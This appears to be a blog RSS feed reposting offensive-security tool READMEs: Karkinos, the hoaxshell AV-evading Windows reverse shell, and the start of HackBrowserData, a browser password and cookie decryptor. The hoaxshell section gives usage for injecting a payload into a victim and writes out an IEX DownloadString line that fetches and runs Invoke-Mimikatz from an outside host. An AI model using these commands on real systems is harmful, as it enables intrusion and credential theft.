<p><a href="https://hakin9.org/wp-content/uploads/2020/12/encode.png"><img decoding="async" class="alignnone wp-image-192571" src="https://hakin9.org/wp-content/uploads/2020/12/encode.png" sizes="(max-width: 798px) 100vw, 798px" srcset="https://hakin9.org/wp-content/uploads/2020/12/encode.png 1636w, https://hakin9.org/wp-content/uploads/2020/12/encode-378x208.png 378w, https://hakin9.org/wp-content/uploads/2020/12/encode-565x311.png 565w, https://hakin9.org/wp-content/uploads/2020/12/encode-460x253.png 460w, https://hakin9.org/wp-content/uploads/2020/12/encode-1024x564.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/encode-768x423.png 768w, https://hakin9.org/wp-content/uploads/2020/12/encode-1536x846.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/encode-500x275.png 500w, https://hakin9.org/wp-content/uploads/2020/12/encode-200x110.png 200w, https://hakin9.org/wp-content/uploads/2020/12/encode-120x66.png 120w, https://hakin9.org/wp-content/uploads/2020/12/encode-310x171.png 310w" alt="" width="798" height="439" /></a></p>
<h3><strong>Encrypt/Decrypt</strong></h3>
<p>Encrypting and decrypting text or files is made easy and is fully trusted since it is done locally.</p>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/encrypt.png"><img loading="lazy" decoding="async" class="alignnone wp-image-192593" src="https://hakin9.org/wp-content/uploads/2020/12/encrypt.png" sizes="auto, (max-width: 853px) 100vw, 853px" srcset="https://hakin9.org/wp-content/uploads/2020/12/encrypt.png 1746w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-378x190.png 378w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-565x284.png 565w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-460x232.png 460w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-1024x516.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-768x387.png 768w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-1536x773.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-500x252.png 500w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-200x101.png 200w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-120x60.png 120w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-310x156.png 310w" alt="" width="853" height="430" /></a></p>
<h3><strong>Reverse Shell Handling</strong></h3>
<p>Reverse shells can be captured and interacted with on this page.</p>
<h3><a id="user-content-create-a-listener-instance" class="anchor" href="https://github.com/helich0pper/Karkinos#create-a-listener-instance" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Create a listener instance</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/reverse-1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232592" src="https://hakin9.org/wp-content/uploads/2020/12/reverse-1.png" sizes="auto, (max-width: 1734px) 100vw, 1734px" srcset="https://hakin9.org/wp-content/uploads/2020/12/reverse-1.png 1734w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-378x194.png 378w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-565x291.png 565w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-460x237.png 460w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-1024x527.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-768x395.png 768w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-1536x790.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-500x257.png 500w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-200x103.png 200w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-120x62.png 120w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-310x159.png 310w" alt="" width="1734" height="892" /></a></p>
<h3><strong>Configure the listener</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232593" src="https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1.png" sizes="auto, (max-width: 1875px) 100vw, 1875px" srcset="https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1.png 1875w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-378x154.png 378w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-565x231.png 565w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-460x188.png 460w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-1024x418.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-768x314.png 768w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-1536x628.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-500x204.png 500w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-200x82.png 200w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-120x49.png 120w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-310x127.png 310w" alt="" width="1875" height="766" /></a></p>
<h3><strong>Start the listener and capture a shell</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/reverse3-1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232594" src="https://hakin9.org/wp-content/uploads/2020/12/reverse3-1.png" sizes="auto, (max-width: 1861px) 100vw, 1861px" srcset="https://hakin9.org/wp-content/uploads/2020/12/reverse3-1.png 1861w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-378x166.png 378w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-565x248.png 565w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-460x202.png 460w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-1024x450.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-768x337.png 768w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-1536x674.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-500x220.png 500w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-200x88.png 200w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-120x53.png 120w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-310x136.png 310w" alt="" width="1861" height="817" /></a></p>
<h3 dir="auto"><strong>Full reverse shell handling demo:</strong></h3>
<div class="fluid-width-video-wrapper"><iframe src="https://www.youtube.com/embed/zriDUmHimXE?modestbranding=1" name="fitvid0" allowfullscreen="allowfullscreen" data-mce-fragment="1"></iframe></div>
<h2 dir="auto"><strong>Directory and File Busting</strong></h2>
<h3 dir="auto"><a id="user-content-create-an-instance" class="anchor" href="https://github.com/helich0pper/Karkinos#create-an-instance" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Create an instance</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/busting1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232595" src="https://hakin9.org/wp-content/uploads/2020/12/busting1.png" sizes="auto, (max-width: 1774px) 100vw, 1774px" srcset="https://hakin9.org/wp-content/uploads/2020/12/busting1.png 1774w, https://hakin9.org/wp-content/uploads/2020/12/busting1-378x191.png 378w, https://hakin9.org/wp-content/uploads/2020/12/busting1-565x286.png 565w, https://hakin9.org/wp-content/uploads/2020/12/busting1-460x233.png 460w, https://hakin9.org/wp-content/uploads/2020/12/busting1-1024x518.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/busting1-768x389.png 768w, https://hakin9.org/wp-content/uploads/2020/12/busting1-1536x778.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/busting1-500x253.png 500w, https://hakin9.org/wp-content/uploads/2020/12/busting1-200x101.png 200w, https://hakin9.org/wp-content/uploads/2020/12/busting1-120x61.png 120w, https://hakin9.org/wp-content/uploads/2020/12/busting1-310x157.png 310w" alt="" width="1774" height="898" /></a></p>
<h3 dir="auto"><strong>Configure it</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/busting2.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232596" src="https://hakin9.org/wp-content/uploads/2020/12/busting2.png" sizes="auto, (max-width: 1880px) 100vw, 1880px" srcset="https://hakin9.org/wp-content/uploads/2020/12/busting2.png 1880w, https://hakin9.org/wp-content/uploads/2020/12/busting2-378x165.png 378w, https://hakin9.org/wp-content/uploads/2020/12/busting2-565x246.png 565w, https://hakin9.org/wp-content/uploads/2020/12/busting2-460x200.png 460w, https://hakin9.org/wp-content/uploads/2020/12/busting2-1024x446.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/busting2-768x335.png 768w, https://hakin9.org/wp-content/uploads/2020/12/busting2-1536x669.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/busting2-500x218.png 500w, https://hakin9.org/wp-content/uploads/2020/12/busting2-200x87.png 200w, https://hakin9.org/wp-content/uploads/2020/12/busting2-120x52.png 120w, https://hakin9.org/wp-content/uploads/2020/12/busting2-310x135.png 310w" alt="" width="1880" height="819" /></a></p>
<h3 dir="auto"><strong>Start scanning</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/busting3.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232597" src="https://hakin9.org/wp-content/uploads/2020/12/busting3.png" sizes="auto, (max-width: 1859px) 100vw, 1859px" srcset="https://hakin9.org/wp-content/uploads/2020/12/busting3.png 1859w, https://hakin9.org/wp-content/uploads/2020/12/busting3-378x179.png 378w, https://hakin9.org/wp-content/uploads/2020/12/busting3-565x267.png 565w, https://hakin9.org/wp-content/uploads/2020/12/busting3-460x218.png 460w, https://hakin9.org/wp-content/uploads/2020/12/busting3-1024x484.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/busting3-768x363.png 768w, https://hakin9.org/wp-content/uploads/2020/12/busting3-1536x726.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/busting3-500x236.png 500w, https://hakin9.org/wp-content/uploads/2020/12/busting3-200x95.png 200w, https://hakin9.org/wp-content/uploads/2020/12/busting3-120x57.png 120w, https://hakin9.org/wp-content/uploads/2020/12/busting3-310x147.png 310w" alt="" width="1859" height="879" /></a></p>
<h3 dir="auto"><strong>Full Directory and File Busting demo:</strong></h3>
<div class="fluid-width-video-wrapper"><iframe src="https://www.youtube.com/embed/cS9j9FXs6bE?modestbranding=1" name="fitvid1" allowfullscreen="allowfullscreen" data-mce-fragment="1"></iframe></div>
<h2 dir="auto"><strong>Port Scanning</strong></h2>
<h3 dir="auto"><a id="user-content-launch-the-scanner" class="anchor" href="https://github.com/helich0pper/Karkinos#launch-the-scanner" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Launch the scanner</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/portscanning1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232598" src="https://hakin9.org/wp-content/uploads/2020/12/portscanning1.png" sizes="auto, (max-width: 1576px) 100vw, 1576px" srcset="https://hakin9.org/wp-content/uploads/2020/12/portscanning1.png 1576w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-378x177.png 378w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-565x265.png 565w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-460x216.png 460w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-1024x480.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-768x360.png 768w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-1536x720.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-500x234.png 500w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-200x94.png 200w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-120x56.png 120w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-310x145.png 310w" alt="" width="1576" height="739" /></a></p>
<h3 dir="auto"><strong>Configure it</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/portscanning2.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232599" src="https://hakin9.org/wp-content/uploads/2020/12/portscanning2.png" sizes="auto, (max-width: 1802px) 100vw, 1802px" srcset="https://hakin9.org/wp-content/uploads/2020/12/portscanning2.png 1802w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-378x144.png 378w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-565x215.png 565w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-460x175.png 460w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-1024x390.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-768x292.png 768w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-1536x585.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-500x190.png 500w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-200x76.png 200w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-120x46.png 120w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-310x118.png 310w" alt="" width="1802" height="686" /></a></p>
<h3 dir="auto"><strong>Start scanning</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/portscanning3.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232600" src="https://hakin9.org/wp-content/uploads/2020/12/portscanning3.png" sizes="auto, (max-width: 1801px) 100vw, 1801px" srcset="https://hakin9.org/wp-content/uploads/2020/12/portscanning3.png 1801w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-378x152.png 378w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-565x227.png 565w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-460x184.png 460w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-1024x411.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-768x308.png 768w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-1536x616.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-500x200.png 500w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-200x80.png 200w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-120x48.png 120w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-310x124.png 310w" alt="" width="1801" height="722" /></a></p>
<h3 dir="auto"><strong>Full Port Scanning Demo</strong>:</h3>
<div class="fluid-width-video-wrapper"><iframe src="https://www.youtube.com/embed/FybH4s_FyNA" name="fitvid2" allowfullscreen="allowfullscreen" data-mce-fragment="1"></iframe></div>
<h2><strong>Generating Hashes</strong></h2>
<p>Karkinos can generate commonly used hashes such as:</p>
<ul>
<li>MD5</li>
<li>SHA1</li>
<li>SHA256</li>
<li>SHA512</li>
</ul>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/convert.png"><img loading="lazy" decoding="async" class="alignnone wp-image-192706" src="https://hakin9.org/wp-content/uploads/2020/12/convert.png" sizes="auto, (max-width: 882px) 100vw, 882px" srcset="https://hakin9.org/wp-content/uploads/2020/12/convert.png 1446w, https://hakin9.org/wp-content/uploads/2020/12/convert-378x221.png 378w, https://hakin9.org/wp-content/uploads/2020/12/convert-565x330.png 565w, https://hakin9.org/wp-content/uploads/2020/12/convert-460x269.png 460w, https://hakin9.org/wp-content/uploads/2020/12/convert-1024x598.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/convert-768x449.png 768w, https://hakin9.org/wp-content/uploads/2020/12/convert-500x292.png 500w, https://hakin9.org/wp-content/uploads/2020/12/convert-200x117.png 200w, https://hakin9.org/wp-content/uploads/2020/12/convert-120x70.png 120w, https://hakin9.org/wp-content/uploads/2020/12/convert-310x181.png 310w" alt="" width="882" height="515" /></a></p>
<h2><strong>Cracking Hashes</strong></h2>
<p>Karkinos offers the option to <strong>simultaneously</strong> crack hashes using a built-in wordlist consisting of over 15 million common and breached passwords. This list can easily be modified and/or completely replaced.</p>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/crack.png"><img loading="lazy" decoding="async" class="alignnone wp-image-192728" src="https://hakin9.org/wp-content/uploads/2020/12/crack.png" sizes="auto, (max-width: 902px) 100vw, 902px" srcset="https://hakin9.org/wp-content/uploads/2020/12/crack.png 1449w, https://hakin9.org/wp-content/uploads/2020/12/crack-378x237.png 378w, https://hakin9.org/wp-content/uploads/2020/12/crack-565x354.png 565w, https://hakin9.org/wp-content/uploads/2020/12/crack-460x288.png 460w, https://hakin9.org/wp-content/uploads/2020/12/crack-1024x641.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/crack-768x481.png 768w, https://hakin9.org/wp-content/uploads/2020/12/crack-500x313.png 500w, https://hakin9.org/wp-content/uploads/2020/12/crack-200x125.png 200w, https://hakin9.org/wp-content/uploads/2020/12/crack-120x75.png 120w, https://hakin9.org/wp-content/uploads/2020/12/crack-310x194.png 310w" alt="" width="902" height="565" /></a></p>
<p>The post <a href="http://kostacipo.stream/karkinos-penetration-testing-and-hacking-ctfs-swiss-army-knife/">Karkinos &#8211; Penetration Testing and Hacking CTF&#8217;s Swiss Army Knife</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/karkinos-penetration-testing-and-hacking-ctfs-swiss-army-knife/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>hoaxshell &#8211; An unconventional Windows reverse shell</title>
		<link>http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/</link>
					<comments>http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 23 Jan 2023 19:15:12 +0000</pubDate>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[reverse shell]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2139</guid>

					<description><![CDATA[<p>Currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic. Purpose hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates its own PowerShell payload and it [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/">hoaxshell &#8211; An unconventional Windows reverse shell</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h3>Currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic.</h3>
<h2 dir="auto"><strong>Purpose</strong></h2>
<p dir="auto">hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates its own PowerShell payload and it supports encryption (ssl).</p>
<p dir="auto">So far, it has been tested on fully updated <strong>Windows 11 Enterprise</strong> and <strong>Windows 10 Pro</strong> boxes (see video and screenshots).</p>
<p dir="auto">More: <a href="https://github.com/t3l3machus/hoaxshell" target="_blank" rel="noopener">https://github.com/t3l3machus/hoaxshell</a></p>
<h3 dir="auto"><a id="user-content-video-presentation" class="anchor" href="https://github.com/t3l3machus/hoaxshell#video-presentation" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Video Presentation</strong></h3>
<p dir="auto"><iframe loading="lazy" src="//www.youtube.com/embed/SEufgD5UxdU" width="560" height="314" allowfullscreen="allowfullscreen"></iframe></p>
<h2 dir="auto"><a id="user-content-screenshots" class="anchor" href="https://github.com/t3l3machus/hoaxshell#screenshots" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Screenshots </strong></h2>
<p><a href="https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-242868" src="https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67.png" sizes="auto, (max-width: 841px) 100vw, 841px" srcset="https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67.png 841w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-460x418.png 460w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-768x698.png 768w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-500x454.png 500w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-200x182.png 200w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-378x343.png 378w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-565x513.png 565w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-120x109.png 120w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-310x282.png 310w" alt="" width="841" height="764" /></a></p>
<p dir="auto">Find more screenshots <a href="https://github.com/t3l3machus/hoaxshell/blob/main/screenshots" target="_blank" rel="noopener">here</a>.</p>
<h2 dir="auto"><a id="user-content-installation" class="anchor" href="https://github.com/t3l3machus/hoaxshell#installation" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Installation</strong></h2>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
</code></pre>
<h2 dir="auto"><a id="user-content-usage" class="anchor" href="https://github.com/t3l3machus/hoaxshell#usage" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Usage</strong></h2>
<p dir="auto"><strong>Important</strong>: As a means of avoiding detection, hoaxshell is automatically generating random values for the session id, URL paths and name of a custom HTTP header utilized in the process, every time the script is started. The generated payload will work only for the instance it was generated for. Use the <code>-g</code> option to bypass this behavior and re-establish an active session or reuse a past generated payload with a new instance of hoaxshell.</p>
<h3 dir="auto"><a id="user-content-basic-shell-session-over-http" class="anchor" href="https://github.com/t3l3machus/hoaxshell#basic-shell-session-over-http" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Basic shell session over HTTP</strong></h3>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>sudo python3 hoaxshell.py -s &lt;your_ip&gt;
</code></pre>
<p dir="auto">When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject into the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the &#8220;rawpayload&#8221; prompt command or start hoaxshell with the <code>-r</code> argument. After the payload has been executed on the victim, you&#8217;ll be able to run PowerShell commands against it.</p>
<h3 dir="auto"><a id="user-content-encrypted-shell-session-https" class="anchor" href="https://github.com/t3l3machus/hoaxshell#encrypted-shell-session-https" target="_blank" rel="noopener" aria-hidden="true"></a>Encrypted shell session (HTTPS):</h3>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code># Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s &lt;your_ip&gt; -c &lt;/path/to/cert.pem&gt; -k &lt;path/to/key.pem&gt;

</code></pre>
<p dir="auto">The generated PowerShell payload will be longer in length because of an additional block of code that disables the SSL certificate validation.</p>
<h3 dir="auto"><a id="user-content-grab-session-mode" class="anchor" href="https://github.com/t3l3machus/hoaxshell#grab-session-mode" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Grab session mode</strong></h3>
<p dir="auto">In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode, it will attempt to re-establish a session, given that the payload is still running on the victim machine.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>sudo python3 hoaxshell.py -s &lt;your_ip&gt; -g
</code></pre>
<p dir="auto"><strong>Important</strong>: Make sure to start hoaxshell with the same settings as the session you are trying to restore (HTTP/HTTPS, port, etc).</p>
<h2 dir="auto"><a id="user-content-limitations" class="anchor" href="https://github.com/t3l3machus/hoaxshell#limitations" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Limitations</strong></h2>
<p dir="auto">The shell is going to hang if you execute a command that initiates an interactive session. Example:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code># this command will execute succesfully and you will have no problem: 
&gt; powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
&gt; powershell

# In the same manner, you won't have a problem executing this:
&gt; cmd /c dir /a

# But this will cause your hoaxshell to hang:
&gt; cmd.exe
</code></pre>
<p dir="auto">So, if you for example would like to run mimikatz through hoaxshell you would need to invoke the commands:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>hoaxshell &gt; IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'
</code></pre>
<p dir="auto">Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell PowerShell context.</p>
</div>
</div>
</div>
</div>
</div>
</div>
<p>The post <a href="http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/">hoaxshell &#8211; An unconventional Windows reverse shell</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>HackBrowserData &#8211; Decrypt passwords/cookies/history/bookmarks from the browser</title>
		<link>http://kostacipo.stream/hackbrowserdata-decrypt-passwords-cookies-history-bookmarks-from-the-browser/</link>
					<comments>http://kostacipo.stream/hackbrowserdata-decrypt-passwords-cookies-history-bookmarks-from-the-browser/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 06 Apr 2022 11:19:02 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Data]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[The Web]]></category>
		<category><![CDATA[passwords]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2132</guid>

					<description><![CDATA[<p>HackBrowserData is an open-source tool that could help you decrypt data (password&#124;bookmark&#124;cookie&#124;history&#124;credit card&#124;downloads link) from the browser. It supports the most popular browsers on the market and runs on Windows, macOS and Linux. Disclaimer: This tool is limited to security research only, and the user assumes all legal and related responsibilities arising from its use! [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/hackbrowserdata-decrypt-passwords-cookies-history-bookmarks-from-the-browser/">HackBrowserData &#8211; Decrypt passwords/cookies/history/bookmarks from the browser</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p dir="auto"><code>HackBrowserData</code> is an open-source tool that could help you decrypt data (password|bookmark|cookie|history|credit card|downloads link) from the browser. It supports the most popular browsers on the market and runs on Windows, macOS and Linux.</p>
<blockquote>
<p dir="auto">Disclaimer: This tool is limited to security research only, and the user assumes all legal and related responsibilities arising from its use! The author assumes no legal responsibility!</p>
</blockquote>
<p><a href="https://github.com/moonD4rk/HackBrowserData" target="_blank" rel="nofollow noopener">https://github.com/moonD4rk/HackBrowserData</a></p>
<h2 dir="auto">Supported Browser</h2>
<h3 dir="auto"><a id="user-content-windows" class="anchor" href="https://github.com/moonD4rk/HackBrowserData#windows" target="_blank" rel="nofollow noopener" aria-hidden="true"></a>Windows</h3>
<table border="1">
<thead>
<tr>
<th align="left"><strong>Browser</strong></th>
<th align="center"><strong>Password</strong></th>
<th align="center"><strong>Cookie</strong></th>
<th align="center"><strong>Bookmark</strong></th>
<th align="center"><strong>History</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Google Chrome</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
